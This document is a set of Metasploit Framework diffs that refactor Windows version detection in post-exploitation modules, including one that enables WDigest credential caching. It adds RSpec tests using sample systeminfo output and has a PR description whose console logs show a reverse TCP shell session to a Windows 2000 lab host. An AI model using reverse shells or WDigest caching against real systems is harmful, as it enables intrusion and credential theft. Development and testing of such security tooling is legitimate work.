--- a/modules/post/windows/manage/wdigest_caching.rb
+++ b/modules/post/windows/manage/wdigest_caching.rb
@@ -6,6 +6,7 @@
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Version
 
   WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
   USE_LOGON_CREDENTIAL = 'UseLogonCredential'
@@ -35,7 +36,8 @@ class MetasploitModule < Msf::Post
     print_status("Running module against #{sysinfo['Computer']}")
     # Check if OS is 8/2012 or newer. If not, no need to set the registry key
     # Can be backported to Windows 7, 2k8R2 but defaults to enabled...
-    if sysinfo['OS'] =~ /Windows (XP|Vista|200[03])/i
+    version = get_version_info
+    if version.build_number < Msf::WindowsVersion::Win7_SP0
       print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...')
     else
       datastore['ENABLE'] ? wdigest_enable : wdigest_disable

--- a/modules/post/windows/recon/outbound_ports.rb
+++ b/modules/post/windows/recon/outbound_ports.rb
@@ -161,8 +161,9 @@ class MetasploitModule < Msf::Post
       return
     end
 
-    if sysinfo['OS'] =~ /XP/
-      print_error('Windows XP is not supported')
+    version = get_version_info
+    if version.xp_or_2003?
+      print_error('Windows XP/Server 2003 is not supported')
       return
     end
 

--- a/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
+++ b/spec/lib/msf/core/post/windows/task_scheduler_spec.rb
@@ -160,7 +160,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
   describe '#check_compatibility' do
     context 'with Windows XP SP2' do
       before :example do
-        allow(subject).to receive(:sysinfo).and_return( { 'OS' => "Windows XP (5.1 Build 2600, Service Pack 2)." } )
+        allow(subject).to receive(:get_version_info).and_return( Msf::WindowsVersion.new(5,1,2600,2,Msf::WindowsVersion::VER_NT_WORKSTATION) )
       end
       it 'sets `@old_schtasks` and `@old_os` to true' do
         subject.send(:check_compatibility)
@@ -171,7 +171,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
 
     context 'with Windows Server 2003 SP2' do
       before :example do
-        allow(subject).to receive(:sysinfo).and_return( { 'OS' => "Windows .NET Server (5.2 Build 3790, Service Pack 2)." } )
+        allow(subject).to receive(:get_version_info).and_return( Msf::WindowsVersion.new(5,2,3790,2,Msf::WindowsVersion::VER_NT_SERVER) )
       end
       it 'sets `@old_schtasks` to false and `@old_os` to true' do
         subject.send(:check_compatibility)
@@ -182,7 +182,7 @@ RSpec.describe Msf::Post::Windows::TaskScheduler do
 
     context 'with Windows Server 2016' do
       before :example do
-        allow(subject).to receive(:sysinfo).and_return( { 'OS' => "Windows 2016+ (10.0 Build 14393)." } )
+        allow(subject).to receive(:get_version_info).and_return( Msf::WindowsVersion.new(10,0,14393,0,Msf::WindowsVersion::VER_NT_SERVER) )
       end
       it 'sets `@old_schtasks` and `@old_os` to false' do
         subject.send(:check_compatibility)

--- a/spec/lib/msf/core/post/windows/version_spec.rb
+++ b/spec/lib/msf/core/post/windows/version_spec.rb
@@ -1,0 +1,356 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+
+
+RSpec.describe Msf::Post::Windows::Version do
+
+  subject do
+    context_described_class = described_class
+
+    klass = Class.new(Msf::Post) do
+      include context_described_class
+    end
+
+    klass.new
+  end
+
+  let(:xp_sp2_systeminfo) do
+    'Host Name:                 SMASH-72A287D2F
+OS Name:                   Microsoft Windows XP Professional
+OS Version:                5.1.2600 Service Pack 2 Build 2600
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Workstation
+OS Build Type:             Uniprocessor Free
+Registered Owner:          smash
+Registered Organization:   
+Product ID:                76487-011-3892913-22389
+Original Install Date:     12/6/2022, 2:27:30 PM
+System Up Time:            0 Days, 0 Hours, 51 Minutes, 12 Seconds
+System Manufacturer:       VMware, Inc.
+System Model:              VMware Virtual Platform
+System type:               X86-based PC
+Processor(s):              1 Processor(s) Installed.
+                           [01]: x86 Family 6 Model 158 Stepping 10 GenuineIntel ~2208 Mhz
+BIOS Version:              INTEL  - 6040000
+Windows Directory:         C:\WINDOWS
+System Directory:          C:\WINDOWS\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (GMT+10:00) Canberra, Melbourne, Sydney
+Total Physical Memory:     511 MB
+Available Physical Memory: 338 MB
+Virtual Memory: Max Size:  2,048 MB
+Virtual Memory: Available: 2,006 MB
+Virtual Memory: In Use:    42 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    WORKGROUP
+Logon Server:              \\\\SMASH-72A287D2F
+Hotfix(s):                 3 Hotfix(s) Installed.
+                           [01]: File 1
+                           [02]: Q147222
+                           [03]: KB911164 - Update
+NetWork Card(s):           1 NIC(s) Installed.
+                           [01]: VMware Accelerated AMD PCNet Adapter
+                                 Connection Name: Local Area Connection
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.73.254
+                                 IP address(es)
+                                 [01]: 192.168.73.147'
+  end
+
+  let(:server2003_sp1_systeminfo) do
+    'Host Name:                 SMASH-P7NPUUMTB
+OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
+OS Version:                5.2.3790 Service Pack 1 Build 3790
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Uniprocessor Free
+Registered Owner:          smash
+Registered Organization:
+Product ID:                69712-012-0000545-42062
+Original Install Date:     12/7/2022, 12:43:01 PM
+System Up Time:            N/A
+System Manufacturer:       VMware, Inc.
+System Model:              VMware Virtual Platform
+System Type:               X86-based PC
+Processor(s):              1 Processor(s) Installed.
+                           [01]: x86 Family 6 Model 158 Stepping 10 GenuineIntel ~2207 Mhz
+BIOS Version:              INTEL  - 6040000
+Windows Directory:         C:\WINDOWS
+System Directory:          C:\WINDOWS\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (GMT+10:00) Canberra, Melbourne, Sydney
+Total Physical Memory:     383 MB
+Available Physical Memory: 229 MB
+Page File: Max Size:       932 MB
+Page File: Available:      799 MB
+Page File: In Use:         133 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    WORKGROUP
+Logon Server:              \\\\SMASH-P7NPUUMTB
+Hotfix(s):                 1 Hotfix(s) Installed.
+                           [01]: Q147222
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Intel(R) PRO/1000 MT Network Connection
+                                 Connection Name: Local Area Connection
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.73.254
+                                 IP address(es)
+                                 [01]: 192.168.73.148'
+  end
+
+  let(:win10_systeminfo) do
+    'Host Name:                 WIN10BASE                 
+OS Name:                   Microsoft Windows 10 Pro                                                               
+OS Version:                10.0.19045 N/A Build 19045
+OS Manufacturer:           Microsoft Corporation     
+OS Configuration:          Standalone Workstation                                                                 
+OS Build Type:             Multiprocessor Free                                                                    
+Registered Owner:          smash
+Registered Organization:   
+Product ID:                00331-20300-00000-AA252
+Original Install Date:     10/05/2021, 5:43:57 PM
+System Boot Time:          2/12/2022, 5:02:02 PM
+System Manufacturer:       QEMU
+System Model:              Standard PC (i440FX + PIIX, 1996)
+System Type:               x64-based PC
+Processor(s):              2 Processor(s) Installed.
+                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+                           [02]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+BIOS Version:              SeaBIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org, 1/04/2014
+Windows Directory:         C:\WINDOWS
+System Directory:          C:\WINDOWS\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (UTC+10:00) Canberra, Melbourne, Sydney
+Total Physical Memory:     10,239 MB
+Available Physical Memory: 5,545 MB
+Virtual Memory: Max Size:  11,839 MB
+Virtual Memory: Available: 6,416 MB
+Virtual Memory: In Use:    5,423 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    WORKGROUP
+Logon Server:              \\\\WIN10BASE
+Hotfix(s):                 17 Hotfix(s) Installed.
+                           [01]: KB5020613
+                           [02]: KB4562830
+                           [03]: KB4577586
+                           [04]: KB4580325
+                           [05]: KB5000736
+                           [06]: KB5012170
+                           [07]: KB5015684
+                           [08]: KB5019959
+                           [09]: KB5011352
+                           [10]: KB5011651
+                           [11]: KB5014032
+                           [12]: KB5014035
+                           [13]: KB5014671
+                           [14]: KB5015895
+                           [15]: KB5016705
+                           [16]: KB5018506
+                           [17]: KB5005699
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Intel(R) PRO/1000 MT Network Connection
+                                 Connection Name: Ethernet
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.20.1
+                                 IP address(es)
+                                 [01]: 192.168.20.230
+                                 [02]: fe80::47ee:641f:d05d:34f6
+Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.'
+  end
+
+  let(:server2022_systeminfo) do
+    'Host Name:                 twenty22
+OS Name:                   Microsoft Windows Server 2022 Datacenter Azure Edition
+OS Version:                10.0.20348 N/A Build 20348
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Multiprocessor Free
+Registered Owner:          N/A
+Registered Organization:   N/A
+Product ID:                00446-90000-00000-AA477
+Original Install Date:     12/2/2022, 5:01:55 AM
+System Boot Time:          12/2/2022, 5:02:20 AM
+System Manufacturer:       Microsoft Corporation
+System Model:              Virtual Machine
+System Type:               x64-based PC
+Processor(s):              1 Processor(s) Installed.
+                           [01]: Intel64 Family 6 Model 85 Stepping 4 GenuineIntel ~2095 Mhz
+BIOS Version:              Microsoft Corporation Hyper-V UEFI Release v4.1, 5/10/2022
+Windows Directory:         C:\Windows
+System Directory:          C:\Windows\system32
+Boot Device:               \Device\HarddiskVolume3
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (UTC) Coordinated Universal Time
+Total Physical Memory:     4,095 MB
+Available Physical Memory: 1,753 MB
+Virtual Memory: Max Size:  5,119 MB
+Virtual Memory: Available: 2,794 MB
+Virtual Memory: In Use:    2,325 MB
+Page File Location(s):     D:\pagefile.sys
+Domain:                    WORKGROUP
+Logon Server:              \\\\twenty22
+Hotfix(s):                 4 Hotfix(s) Installed.
+                           [01]: KB5020619
+                           [02]: KB5012170
+                           [03]: KB5019081
+                           [04]: KB5017399
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Microsoft Hyper-V Network Adapter
+                                 Connection Name: Ethernet
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     168.63.129.16
+                                 IP address(es)
+                                 [01]: 10.1.0.4
+                                 [02]: fe80::9232:386b:229f:402f
+Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.'
+  end
+
+  let(:server2012_systeminfo) do
+    'Host Name:                 WIN2012DC
+OS Name:                   Microsoft Windows Server 2012 Standard
+OS Version:                6.2.9200 N/A Build 9200
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Primary Domain Controller
+OS Build Type:             Multiprocessor Free
+Registered Owner:          Windows User
+Registered Organization:
+Product ID:                00184-30000-00001-AA641
+Original Install Date:     8/09/2021, 3:22:39 AM
+System Boot Time:          27/10/2022, 1:09:24 PM
+System Manufacturer:       QEMU
+System Model:              Standard PC (i440FX + PIIX, 1996)
+System Type:               x64-based PC
+Processor(s):              2 Processor(s) Installed.
+                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+                           [02]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+BIOS Version:              SeaBIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org, 1/04/2014
+Windows Directory:         C:\Windows
+System Directory:          C:\Windows\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-au;English (Australia)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (UTC+10:00) Canberra, Melbourne, Sydney
+Total Physical Memory:     5,095 MB
+Available Physical Memory: 2,811 MB
+Virtual Memory: Max Size:  5,927 MB
+Virtual Memory: Available: 3,460 MB
+Virtual Memory: In Use:    2,467 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    pod8.lan
+Logon Server:              \\\\WIN2012DC
+Hotfix(s):                 1 Hotfix(s) Installed.
+                           [01]: KB2999226
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Intel(R) PRO/1000 MT Network Connection
+                                 Connection Name: Ethernet
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.20.1
+                                 IP address(es)
+                                 [01]: 192.168.20.210
+                                 [02]: fe80::3d4f:28f8:dff2:5b29
+Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.'
+  end
+
+  let(:server2008r2_sp1_systeminfo) do
+    'Host Name:                 WIN-QL13MCNSIB2
+OS Name:                   Microsoft Windows Server 2008 R2 Standard
+OS Version:                6.1.7601 Service Pack 1 Build 7601
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Multiprocessor Free
+Registered Owner:          Windows User
+Registered Organization:
+Product ID:                00477-179-0000007-84039
+Original Install Date:     12/6/2022, 4:07:05 AM
+System Boot Time:          12/5/2022, 8:23:53 PM
+System Manufacturer:       QEMU
+System Model:              Standard PC (i440FX + PIIX, 1996)
+System Type:               x64-based PC
+Processor(s):              2 Processor(s) Installed.
+                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+                           [02]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+BIOS Version:              SeaBIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org, 4/1/2014
+Windows Directory:         C:\Windows
+System Directory:          C:\Windows\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
+Total Physical Memory:     2,047 MB
+Available Physical Memory: 1,310 MB
+Virtual Memory: Max Size:  4,095 MB
+Virtual Memory: Available: 3,197 MB
+Virtual Memory: In Use:    898 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    WORKGROUP
+Logon Server:              \\\\WIN-QL13MCNSIB2
+Hotfix(s):                 1 Hotfix(s) Installed.
+                           [01]: KB976902
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Intel(R) PRO/1000 MT Network Connection
+                                 Connection Name: Local Area Connection
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.20.1
+                                 IP address(es)
+                                 [01]: 192.168.20.130
+                                 [02]: fe80::1469:cb66:dc1d:78bc'
+  end
+
+  context "#systeminfo_parsed" do
+    it "parses systeminfo on XP" do
+      allow(subject).to receive(:cmd_exec) { xp_sp2_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::XP_SP2)
+      expect(version.windows_server?).to eq(false)
+    end
+
+    it "parses systeminfo on 2003" do
+      allow(subject).to receive(:cmd_exec) { server2003_sp1_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::Server2003_SP1)
+      expect(version.windows_server?).to eq(true)
+    end
+
+    it "parses systeminfo on Win10" do
+      allow(subject).to receive(:cmd_exec) { win10_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::Win10_22H2)
+      expect(version.windows_server?).to eq(false)
+    end
+
+    it "parses systeminfo on 2022" do
+      allow(subject).to receive(:cmd_exec) { server2022_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::Server2022)
+      expect(version.windows_server?).to eq(true)
+    end
+
+    it "parses systeminfo on 2012" do
+      allow(subject).to receive(:cmd_exec) { server2012_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::Server2012)
+      expect(version.windows_server?).to eq(true)
+    end
+
+    it "parses systeminfo on 2008R2" do
+      allow(subject).to receive(:cmd_exec) { server2008r2_sp1_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::Server2008_R2_SP1)
+      expect(version.windows_server?).to eq(true)
+    end
+
+  end
+end

--- a/spec/lib/msf/core/post/windows/version_spec.rb
+++ b/spec/lib/msf/core/post/windows/version_spec.rb
@@ -102,6 +102,50 @@ Network Card(s):           1 NIC(s) Installed.
                                  [01]: 192.168.73.148'
   end
 
+  let(:server2008_sp2_systeminfo) do
+    'Host Name:                 WIN2008DC
+OS Name:                   Microsoftr Windows Serverr 2008 Standard
+OS Version:                6.0.6002 Service Pack 2 Build 6002
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Primary Domain Controller
+OS Build Type:             Multiprocessor Free
+Registered Owner:          Windows User
+Registered Organization:
+Product ID:                92573-082-2500115-76258
+Original Install Date:     7/7/2022, 9:49:59 AM
+System Boot Time:          11/29/2022, 9:44:06 AM
+System Manufacturer:       QEMU
+System Model:              Standard PC (i440FX + PIIX, 1996)
+System Type:               x64-based PC
+Processor(s):              1 Processor(s) Installed.
+                           [01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~3392 Mhz
+BIOS Version:              SeaBIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org, 4/1/2014
+Windows Directory:         C:\Windows
+System Directory:          C:\Windows\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (GMT+10:00) Canberra, Melbourne, Sydney
+Total Physical Memory:     4,095 MB
+Available Physical Memory: 2,833 MB
+Page File: Max Size:       8,363 MB
+Page File: Available:      7,083 MB
+Page File: In Use:         1,280 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    pod7.local
+Logon Server:              \\WIN2008DC
+Hotfix(s):                 1 Hotfix(s) Installed.
+                           [01]: KB955430
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Intel(R) PRO/1000 MT Network Connection
+                                 Connection Name: Local Area Connection
+                                 DHCP Enabled:    Yes
+                                 DHCP Server:     192.168.20.1
+                                 IP address(es)
+                                 [01]: 192.168.20.99
+                                 [02]: fe80::4d31:5b50:425a:4df0'
+  end
+
   let(:win10_systeminfo) do
     'Host Name:                 WIN10BASE                 
 OS Name:                   Microsoft Windows 10 Pro                                                               
@@ -310,6 +354,7 @@ Network Card(s):           1 NIC(s) Installed.
       version = subject.get_version_info
       expect(version.build_number).to eq(Msf::WindowsVersion::XP_SP2)
       expect(version.windows_server?).to eq(false)
+      expect(version.domain_controller?).to eq(false)
     end
 
     it "parses systeminfo on 2003" do
@@ -318,6 +363,7 @@ Network Card(s):           1 NIC(s) Installed.
       version = subject.get_version_info
       expect(version.build_number).to eq(Msf::WindowsVersion::Server2003_SP1)
       expect(version.windows_server?).to eq(true)
+      expect(version.domain_controller?).to eq(false)
     end
 
     it "parses systeminfo on Win10" do
@@ -326,6 +372,7 @@ Network Card(s):           1 NIC(s) Installed.
       version = subject.get_version_info
       expect(version.build_number).to eq(Msf::WindowsVersion::Win10_22H2)
       expect(version.windows_server?).to eq(false)
+      expect(version.domain_controller?).to eq(false)
     end
 
     it "parses systeminfo on 2022" do
@@ -334,6 +381,7 @@ Network Card(s):           1 NIC(s) Installed.
       version = subject.get_version_info
       expect(version.build_number).to eq(Msf::WindowsVersion::Server2022)
       expect(version.windows_server?).to eq(true)
+      expect(version.domain_controller?).to eq(false)
     end
 
     it "parses systeminfo on 2012" do
@@ -342,6 +390,7 @@ Network Card(s):           1 NIC(s) Installed.
       version = subject.get_version_info
       expect(version.build_number).to eq(Msf::WindowsVersion::Server2012)
       expect(version.windows_server?).to eq(true)
+      expect(version.domain_controller?).to eq(true)
     end
 
     it "parses systeminfo on 2008R2" do
@@ -350,6 +399,16 @@ Network Card(s):           1 NIC(s) Installed.
       version = subject.get_version_info
       expect(version.build_number).to eq(Msf::WindowsVersion::Server2008_R2_SP1)
       expect(version.windows_server?).to eq(true)
+      expect(version.domain_controller?).to eq(false)
+    end
+
+    it "parses systeminfo on 2008" do
+      allow(subject).to receive(:cmd_exec) { server2008_sp2_systeminfo }
+      allow(subject).to receive_message_chain('session.type').and_return('shell')
+      version = subject.get_version_info
+      expect(version.build_number).to eq(Msf::WindowsVersion::Server2008_SP2)
+      expect(version.windows_server?).to eq(true)
+      expect(version.domain_controller?).to eq(true)
     end
 
   end

--- a/spec/lib/msf/core/windows_version_spec.rb
+++ b/spec/lib/msf/core/windows_version_spec.rb
@@ -1,0 +1,24 @@
+require 'spec_helper'
+
+RSpec.describe Msf::WindowsVersion do
+
+  it 'Recognisises a major version' do
+    subject = described_class.new(6, 0, 6000, 0, Msf::WindowsVersion::VER_NT_WORKSTATION)
+    expect(subject.to_s).to eq('Windows Vista')
+  end
+
+  it 'Recognisises Windows Server' do
+    subject = described_class.new(6, 0, 6000, 0, Msf::WindowsVersion::VER_NT_SERVER)
+    expect(subject.to_s).to eq('Windows Server 2008')
+  end
+
+  it 'Adds build suffix to Windows 10' do
+    subject = described_class.new(10,0,18362,0,Msf::WindowsVersion::VER_NT_WORKSTATION)
+    expect(subject.to_s).to eq('Windows 10+ Build 18362')
+  end
+
+  it 'Adds service pack suffix' do
+    subject = described_class.new(5,1,2600,2,Msf::WindowsVersion::VER_NT_WORKSTATION)
+    expect(subject.to_s).to eq('Windows XP Service Pack 2')
+  end
+end

--- a/spec/lib/msf/core/windows_version_spec.rb
+++ b/spec/lib/msf/core/windows_version_spec.rb
@@ -21,4 +21,9 @@ RSpec.describe Msf::WindowsVersion do
     subject = described_class.new(5,1,2600,2,Msf::WindowsVersion::VER_NT_WORKSTATION)
     expect(subject.to_s).to eq('Windows XP Service Pack 2')
   end
+
+  it 'Outputs unknown version' do
+    subject = described_class.new(1,2,3000,0,Msf::WindowsVersion::VER_NT_WORKSTATION)
+    expect(subject.to_s).to eq('Unknown Windows version: 1.2.3000')
+  end
 end


### PR DESCRIPTION
I noticed that there was an entry for Windows 2000, but it could never be selected. 
 Windows 2000 does not have the `systeminfo` command, so it would fail rather than set the value as Windows 2000.

This change checks to see if the `systeminfo` command failed because it was not recognized as a valid command and falls back to `ver`, present on Windows 2K and 98.

The downside is that `ver` does not give the service pack versions, but I don't see anywhere we use them.  I considered pulling the service pack from the registry, but I discovered that `reg query` is also not included, so..... yeah.

This quick change identifies and sets the proper value for Windows 2000.

Old:
```
msf6 payload(windows/shell_reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:6789 
[*] Command shell session 1 opened (10.5.135.201:6789 -> 10.5.132.113:1029) at 2023-01-31 20:29:25 -0600

msf6 payload(windows/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
          

C:\Documents and Settings\msfuser\Desktop>systeminfo
systeminfo
'systeminfo' is not recognized as an internal or external command,
operable program or batch file.

C:\Documents and Settings\msfuser\Desktop>ver
ver

Microsoft Windows 2000 [Version 5.00.2195]

C:\Documents and Settings\msfuser\Desktop>^Z
Background session 1? [y/N]  y
msf6 payload(windows/shell_reverse_tcp) > use post/windows/manage/get_version_info 
msf6 post(windows/manage/get_version_info) > set session 1
session => 1
msf6 post(windows/manage/get_version_info) > set verbose true
verbose => true
msf6 post(windows/manage/get_version_info) > run

[-] Couldn't retrieve the target's build number!
[-] Post failed: RuntimeError Couldn't retrieve the target's build number!
[-] Call stack:
[-]   /home/tmoose/rapid7/metasploit-framework/lib/msf/core/post/windows/version.rb:36:in `get_version_info'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/windows/manage/get_version_info.rb:30:in `run'
[*] Post module execution completed
msf6 post(windows/manage/get_version_info) > 

```

New:
```
msf6 payload(windows/shell_reverse_tcp) > [*] Command shell session 1 opened (10.5.135.201:6789 -> 10.5.132.113:1030) at 2023-01-31 20:32:20 -0600

msf6 payload(windows/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\msfuser\Desktop>
-----
          

C:\Documents and Settings\msfuser\Desktop>^Z
Background session 1? [y/N]  y
msf6 payload(windows/shell_reverse_tcp) > use post/windows/manage/get_version_info 
msf6 post(windows/manage/get_version_info) > set session 1
session => 1
msf6 post(windows/manage/get_version_info) > set verbose true
verbose => true
msf6 post(windows/manage/get_version_info) > run

[*] Windows 2000
[*] Post module execution completed
msf6 post(windows/manage/get_version_info) > 

```